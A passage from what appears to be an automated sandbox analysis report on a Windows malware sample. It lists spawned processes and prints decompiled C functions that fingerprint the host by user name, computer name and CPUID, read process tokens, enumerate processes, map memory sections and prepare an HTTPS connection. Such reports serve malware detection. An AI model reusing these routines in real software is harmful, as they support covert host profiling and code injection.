                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: cvtres.exe PID: 6152 Parent PID: 5760

                          General

                          Start time:10:34:36
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
                          Imagebase:0x7ff62ec30000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: csc.exe PID: 3520 Parent PID: 7012

                          General

                          Start time:10:34:37
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
                          Imagebase:0x7ff768110000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Chronological Activities

                          Analysis Process: control.exe PID: 6580 Parent PID: 6424

                          General

                          Start time:10:34:37
                          Start date:14/12/2021
                          Path:C:\Windows\System32\control.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\control.exe -h
                          Imagebase:0x7ff65b0e0000
                          File size:117760 bytes
                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: control.exe PID: 4912 Parent PID: 6388

                          General

                          Start time:10:34:37
                          Start date:14/12/2021
                          Path:C:\Windows\System32\control.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\control.exe -h
                          Imagebase:0x7ff65b0e0000
                          File size:117760 bytes
                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: cvtres.exe PID: 6540 Parent PID: 6248

                          General

                          Start time:10:34:38
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
                          Imagebase:0x7ff62ec30000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: rundll32.exe PID: 3492 Parent PID: 4904

                          General

                          Start time:10:34:39
                          Start date:14/12/2021
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                          Imagebase:0x7ff6d6300000
                          File size:69632 bytes
                          MD5 hash:73C519F050C20580F8A62C849D49215A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Disassembly

                          Code Analysis

                          Reset < >

                            Analysis Process: rundll32.exe PID: 6424 Parent PID: 6360 rundll32.exeCOMMON

                            Executed Functions

                            Function 00F1A303, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 96%
                            			E00F1A303(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xf1d2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00F17855( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xf1d2b4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xf1d270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00F147A4(_v8 + _v8, _t63);
							}
							HeapFree( *0xf1d270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xf1d270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00F147A4(_v8 + _v8, _t63);
						}
						HeapFree( *0xf1d270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                            0x00f1a303
                            0x00f1a30b
                            0x00f1a311
                            0x00f1a314
                            0x00f1a317
                            0x00f1a319
                            0x00f1a31e
                            0x00f1a31e
                            0x00f1a324
                            0x00f1a326
                            0x00f1a333
                            0x00f1a394
                            0x00f1a335
                            0x00f1a33a
                            0x00f1a340
                            0x00f1a345
                            0x00f1a353
                            0x00f1a357
                            0x00f1a366
                            0x00f1a36d
                            0x00f1a374
                            0x00f1a374
                            0x00f1a37f
                            0x00f1a37f
                            0x00f1a357
                            0x00f1a345
                            0x00f1a396
                            0x00f1a39c
                            0x00f1a3a6
                            0x00f1a3a8
                            0x00f1a3ad
                            0x00f1a3bc
                            0x00f1a3c0
                            0x00f1a3cb
                            0x00f1a3d2
                            0x00f1a3d9
                            0x00f1a3d9
                            0x00f1a3e5
                            0x00f1a3e5
                            0x00f1a3c0
                            0x00f1a3ee
                            0x00f1a3f0
                            0x00f1a3f3
                            0x00f1a3f5
                            0x00f1a3f8
                            0x00f1a3fb
                            0x00f1a405
                            0x00f1a409
                            0x00f1a40d

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 00F1A33A
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 00F1A351
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 00F1A35E
                            • HeapFree.KERNEL32(00000000,00000000), ref: 00F1A37F
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00F1A3A6
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00F1A3BA
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00F1A3C7
                            • HeapFree.KERNEL32(00000000,00000000), ref: 00F1A3E5
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: HeapName$AllocateComputerFreeUser
                            • String ID:
                            • API String ID: 3239747167-0
                            • Opcode ID: f9ab61ce9f65d639f21bb9ceeb70b15fbe93a26478f92c075d9316164c8af52f
                            • Instruction ID: 84fa7b72fe7e570d0345824b8dfcb36a1c883fb732a8debb1516620fb3fad40b
                            • Opcode Fuzzy Hash: f9ab61ce9f65d639f21bb9ceeb70b15fbe93a26478f92c075d9316164c8af52f
                            • Instruction Fuzzy Hash: 0B311776A00209EFDB11DFA9DD81BAEB7F9FF48310F268029E415D2250E731ED41AB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F16C06, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 38%
                            			E00F16C06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00F155DC(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00F16DFA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                            0x00f16c13
                            0x00f16c14
                            0x00f16c15
                            0x00f16c16
                            0x00f16c17
                            0x00f16c1b
                            0x00f16c22
                            0x00f16c31
                            0x00f16c34
                            0x00f16c37
                            0x00f16c3e
                            0x00f16c41
                            0x00f16c44
                            0x00f16c47
                            0x00f16c4a
                            0x00f16c55
                            0x00f16c57
                            0x00f16c60
                            0x00f16c68
                            0x00f16c6a
                            0x00f16c7c
                            0x00f16c86
                            0x00f16c8a
                            0x00f16c99
                            0x00f16c9d
                            0x00f16ca6
                            0x00f16cae
                            0x00f16cae
                            0x00f16cb0
                            0x00f16cb0
                            0x00f16cb8
                            0x00f16cbe
                            0x00f16cc2
                            0x00f16cc2
                            0x00f16ccd

                            APIs
                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00F16C4D
                            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00F16C60
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00F16C7C
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00F16C99
                            • memcpy.NTDLL(?,00000000,0000001C), ref: 00F16CA6
                            • NtClose.NTDLL(?), ref: 00F16CB8
                            • NtClose.NTDLL(00000000), ref: 00F16CC2
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 2575439697-0
                            • Opcode ID: 1a7ec4ee030ef2cadfcd18797f72b5c9471f2817bdf5d409367d8c60afa2456e
                            • Instruction ID: c14a79fad556c897667a4ce0a335ba531eff86d193f45a6f79bf41cc9a15ff50
                            • Opcode Fuzzy Hash: 1a7ec4ee030ef2cadfcd18797f72b5c9471f2817bdf5d409367d8c60afa2456e
                            • Instruction Fuzzy Hash: C52114B294022CBBDB01AF95DC45ADEBFBDEF08750F104026F905F6220D7759A85ABE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F13309, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                            Download Yara Rule
                            C-Code - Quality: 61%
                            			E00F13309() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xf1d2b8; // 0x48da5a8
						_push(_t9 + 0xf1ee88);
						_push( &_v264);
						if( *0xf1d110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                            0x00f13314
                            0x00f13319
                            0x00f1331e
                            0x00f13322
                            0x00f1332c
                            0x00f1335d
                            0x00f13333
                            0x00f1333e
                            0x00f13345
                            0x00f1334e
                            0x00f13365
                            0x00f13350
                            0x00f13358
                            0x00000000
                            0x00f13358
                            0x00f13366
                            0x00f13367
                            0x00000000
                            0x00f13367
                            0x00000000
                            0x00f13361
                            0x00f1336d
                            0x00f13372

                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F13319
                            • Process32First.KERNEL32(00000000,?), ref: 00F1332C
                            • Process32Next.KERNEL32(00000000,?), ref: 00F13358
                            • CloseHandle.KERNEL32(00000000), ref: 00F13367
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 96025c4186688e09db6411a9daabf89a3b9e9cdf2c30b2f80e312c1185548bc9
                            • Instruction ID: 167b2173b4ecb7e6bd75dc7e0d4eee405e3da785605ff23438f6dacdf2a5ff9e
                            • Opcode Fuzzy Hash: 96025c4186688e09db6411a9daabf89a3b9e9cdf2c30b2f80e312c1185548bc9
                            • Instruction Fuzzy Hash: C5F0BB729010286BE720A7669C49EEB77ACEBC5760F010051F969D3000EE64DBC6A6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F14638, Relevance: 3.1, APIs: 2, Instructions: 123COMMON
                            Download Yara Rule
                            C-Code - Quality: 21%
                            			E00F14638(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _t34;
				long _t36;
				long _t37;
				signed int _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E00F165F6(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0 || _t69 == 0 && _t37 > 2) {
						_a4 = 4;
					} else {
						_a4 = 0;
					}
					__imp__(_t63, _a4, 0, 0, 0); // executed
					 *(_t66 + 0x10) = _t37;
					_t38 = E00F16DFA(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E00F165F6(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x6ff6f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E00F16DFA(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E00F165F6(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
										_t42 =  *0xf1d2b8; // 0x48da5a8
										_t43 = _t42 + 0xf1e758;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E00F16DFA(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}




















                            0x00f14638
                            0x00f14647
                            0x00f1464d
                            0x00f1477c
                            0x00f1477c
                            0x00f14653
                            0x00f14653
                            0x00f14659
                            0x00f1465b
                            0x00f14669
                            0x00f14664
                            0x00f14664
                            0x00f14664
                            0x00f14677
                            0x00f1467e
                            0x00f14681
                            0x00f14689
                            0x00000000
                            0x00f1468f
                            0x00f14691
                            0x00f14698
                            0x00f1469b
                            0x00000000
                            0x00f146a1
                            0x00f146a4
                            0x00f146aa
                            0x00f146c1
                            0x00f146cd
                            0x00f146d6
                            0x00f146d9
                            0x00f146e1
                            0x00000000
                            0x00f146e7
                            0x00f146ea
                            0x00f146f6
                            0x00f146fc
                            0x00000000
                            0x00f146fe
                            0x00f14701
                            0x00f1470a
                            0x00f14714
                            0x00f1471b
                            0x00f1471e
                            0x00f14723
                            0x00f14728
                            0x00000000
                            0x00f1472a
                            0x00f1472c
                            0x00f14738
                            0x00f1473b
                            0x00f14743
                            0x00f14745
                            0x00f14756
                            0x00f14756
                            0x00f14758
                            0x00f1475c
                            0x00f1475d
                            0x00f1475f
                            0x00f14766
                            0x00000000
                            0x00f14768
                            0x00f14768
                            0x00f1476c
                            0x00f1476d
                            0x00f1476f
                            0x00f14776
                            0x00000000
                            0x00f14778
                            0x00f14778
                            0x00f14778
                            0x00f14776
                            0x00f14766
                            0x00f14728
                            0x00f146fc
                            0x00f146ac
                            0x00f146b7
                            0x00f146bb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f146bb
                            0x00f146aa
                            0x00f1469b
                            0x00f14689
                            0x00f14785

                            APIs
                              • Part of subcall function 00F165F6: lstrlen.KERNEL32(?,00000000,057F9B78,00000000,00F125B8,?,69B25F44,?,?,?,?,69B25F44,00000005,00F1D00C,?,?), ref: 00F165FD
                              • Part of subcall function 00F165F6: mbstowcs.NTDLL ref: 00F16626
                              • Part of subcall function 00F165F6: memset.NTDLL ref: 00F16638
                            • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00F1572B,751881D0,00000000,057F9618,?,?,00F13B91,?,057F9618,0000EA60), ref: 00F14653
                            • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00F1572B,751881D0,00000000,057F9618,?,?,00F13B91,?,057F9618,0000EA60), ref: 00F1477C
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                            • String ID:
                            • API String ID: 4097109750-0
                            • Opcode ID: dd98d11f30a27d7cb15c4cc259cd643ba2cfb114464abbe3e0376cefb68a6dea
                            • Instruction ID: fc40ecda38b2f84d58849119a23ee0dfed239286594572723cd682b32a05d1ae
                            • Opcode Fuzzy Hash: dd98d11f30a27d7cb15c4cc259cd643ba2cfb114464abbe3e0376cefb68a6dea
                            • Instruction Fuzzy Hash: C4416271500208FFEB219FA4CC89EEB7BBDEB49751F058529FA02D50A1D771E984AB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F17562, Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E00F17562(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00F165B4(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                            0x00f1756b
                            0x00f17572
                            0x00f17573
                            0x00f17574
                            0x00f17575
                            0x00f17576
                            0x00f17587
                            0x00f1758b
                            0x00f1759f
                            0x00f175a2
                            0x00f175a5
                            0x00f175ac
                            0x00f175af
                            0x00f175b6
                            0x00f175b9
                            0x00f175bc
                            0x00f175bf
                            0x00f175c4
                            0x00f175ff
                            0x00f175c6
                            0x00f175c9
                            0x00f175cf
                            0x00f175d4
                            0x00f175d8
                            0x00f175f6
                            0x00f175da
                            0x00f175e1
                            0x00f175ef
                            0x00f175ef
                            0x00f175d8
                            0x00f17607

                            APIs
                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,00F16DA4), ref: 00F175BF
                              • Part of subcall function 00F165B4: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00F175D4,00000002,00000000,?,?,00000000,?,?,00F175D4,00000000), ref: 00F165E1
                            • memset.NTDLL ref: 00F175E1
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Section$CreateViewmemset
                            • String ID:
                            • API String ID: 2533685722-0
                            • Opcode ID: 7b17b77b2f6c88aa2ae40b1cc99be76bae56fb1d76c391742396b67112d96bb9
                            • Instruction ID: 8435ec92719d4932c09db7fb890cc7ace6aa7e599cba0b42fccc9ba68fbc4737
                            • Opcode Fuzzy Hash: 7b17b77b2f6c88aa2ae40b1cc99be76bae56fb1d76c391742396b67112d96bb9
                            • Instruction Fuzzy Hash: 15211DB6D00209AFDB11DFA9C8849DEFBBAFF48354F104429E505F3210D735AA449BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F13A79, Relevance: 3.0, APIs: 2, Instructions: 47memorytimeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F13A79(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t15;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E00F165F6(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E00F16B4F(__ecx, _a4, _a8, _t23); // executed
					_t20 = _t15;
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E00F16E41(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0xf1d270, 0, _t23);
				}
				return _t20;
			}










                            0x00f13a79
                            0x00f13a8a
                            0x00f13a8e
                            0x00f13ae7
                            0x00f13a90
                            0x00f13a97
                            0x00f13a9d
                            0x00f13aa1
                            0x00f13aa6
                            0x00f13aaa
                            0x00f13ab0
                            0x00f13ac0
                            0x00f13ad2
                            0x00f13ad2
                            0x00f13add
                            0x00f13add
                            0x00f13aee

                            APIs
                              • Part of subcall function 00F165F6: lstrlen.KERNEL32(?,00000000,057F9B78,00000000,00F125B8,?,69B25F44,?,?,?,?,69B25F44,00000005,00F1D00C,?,?), ref: 00F165FD
                              • Part of subcall function 00F165F6: mbstowcs.NTDLL ref: 00F16626
                              • Part of subcall function 00F165F6: memset.NTDLL ref: 00F16638
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000014,00000000,00000008,00000000,75145520,00000008,00000014,?,057F93AC), ref: 00F13AB0
                            • HeapFree.KERNEL32(00000000,00000000,?,00000014,00000000,00000008,00000000,75145520,00000008,00000014,?,057F93AC), ref: 00F13ADD
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                            • String ID:
                            • API String ID: 1500278894-0
                            • Opcode ID: e5ae4a83579499f411610d5dd1e95a77b9b5b537e79d1e9ca043ffb29404acd1
                            • Instruction ID: 552e1d84f673b1a502428bec1bdb43f96268c357045dca68c538a396579321e4
                            • Opcode Fuzzy Hash: e5ae4a83579499f411610d5dd1e95a77b9b5b537e79d1e9ca043ffb29404acd1
                            • Instruction Fuzzy Hash: EA014B36600209BBDB216FA8DC45EDB7FB9FF84710F108025FA4096161EB76D9A8E760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F165B4, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E00F165B4(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                            0x00f165c6
                            0x00f165cc
                            0x00f165da
                            0x00f165e1
                            0x00f165e6
                            0x00f165ec
                            0x00000000
                            0x00f165ed
                            0x00000000

                            APIs
                            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00F175D4,00000002,00000000,?,?,00000000,?,?,00F175D4,00000000), ref: 00F165E1
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: SectionView
                            • String ID:
                            • API String ID: 1323581903-0
                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
